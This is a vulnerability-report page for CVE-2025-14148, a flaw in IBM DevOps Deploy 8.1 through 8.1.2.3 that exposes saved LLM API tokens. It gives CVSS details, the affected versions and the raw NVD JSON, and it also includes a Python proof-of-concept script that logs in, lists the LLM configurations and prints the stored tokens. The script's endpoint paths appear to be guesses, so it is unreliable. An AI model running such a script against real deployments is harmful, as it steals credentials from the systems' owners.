Security Vulnerability Report
CVE-2025-14148 CVSS 6.5 MEDIUM

CVE-2025-14148

Published: 2025-12-15 20:15:49
Last Modified: 2025-12-18 17:53:32

Description

IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 could allow an authenticated user with LLM integration configuration privileges to recover a previously saved LLM API Token.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:devops_deploy:*:*:*:*:*:*:*:* - VULNERABLE
IBM UrbanCode Deploy 8.1
IBM UrbanCode Deploy 8.1.0
IBM UrbanCode Deploy 8.1.1
IBM UrbanCode Deploy 8.1.2
IBM UrbanCode Deploy 8.1.2.1
IBM UrbanCode Deploy 8.1.2.2
IBM UrbanCode Deploy 8.1.2.3
IBM DevOps Deploy 8.1 through 8.1.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-14148 PoC - IBM UCD LLM API Token Recovery
# Target: IBM UrbanCode Deploy / DevOps Deploy 8.1 - 8.1.2.3

TARGET_URL = "https://target-ibm-ucd.example.com"
USERNAME = "attacker_user"
PASSWORD = "password123"


def exploit_llm_token_disclosure():
    """
    This PoC demonstrates how an authenticated user with LLM integration
    configuration privileges can recover previously saved LLM API Tokens.
    """
    session = requests.Session()

    # Step 1: Authenticate to IBM UCD
    login_url = f"{TARGET_URL}/rest/security/authentication"
    login_data = {"userName": USERNAME, "password": PASSWORD}
    response = session.post(login_url, json=login_data, verify=False)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return None
    print("[+] Authentication successful")

    # Step 2: Enumerate LLM integration configurations
    # Requires LLM integration configuration privileges
    llm_config_url = f"{TARGET_URL}/rest/integrations/llm/configurations"
    response = session.get(llm_config_url, verify=False)
    if response.status_code == 200:
        configs = response.json()
        print(f"[+] Found {len(configs)} LLM configurations")

        # Step 3: Extract API Tokens from configurations
        for config in configs:
            config_id = config.get("id")
            config_name = config.get("name")
            # Get detailed configuration including API Token
            detail_url = f"{TARGET_URL}/rest/integrations/llm/configurations/{config_id}"
            detail_response = session.get(detail_url, verify=False)
            if detail_response.status_code == 200:
                details = detail_response.json()
                api_token = details.get("apiToken") or details.get("api_key")
                if api_token:
                    print(f"[*] Configuration: {config_name}")
                    print(f"[*] API Token: {api_token}")
                    return api_token

    print("[-] No LLM API Tokens found or access denied")
    return None


if __name__ == "__main__":
    print("CVE-2025-14148 PoC - IBM UCD LLM Token Disclosure")
    print("=" * 50)
    token = exploit_llm_token_disclosure()
    if token:
        print(f"\n[+] Successfully recovered LLM API Token: {token}")

References

https://www.ibm.com/support/pages/node/7254663 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14148",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T20:15:49.043",
    "lastModified": "2025-12-18T17:53:31.707",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 could allow an authenticated user with LLM integration configuration privileges to recover a previously saved LLM API Token."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-522"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ibm:devops_deploy:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.1.0.0",
                "versionEndExcluding": "8.1.2.4",
                "matchCriteriaId": "749B35C4-217A-4507-A9FB-85C7907D837B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7254663",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}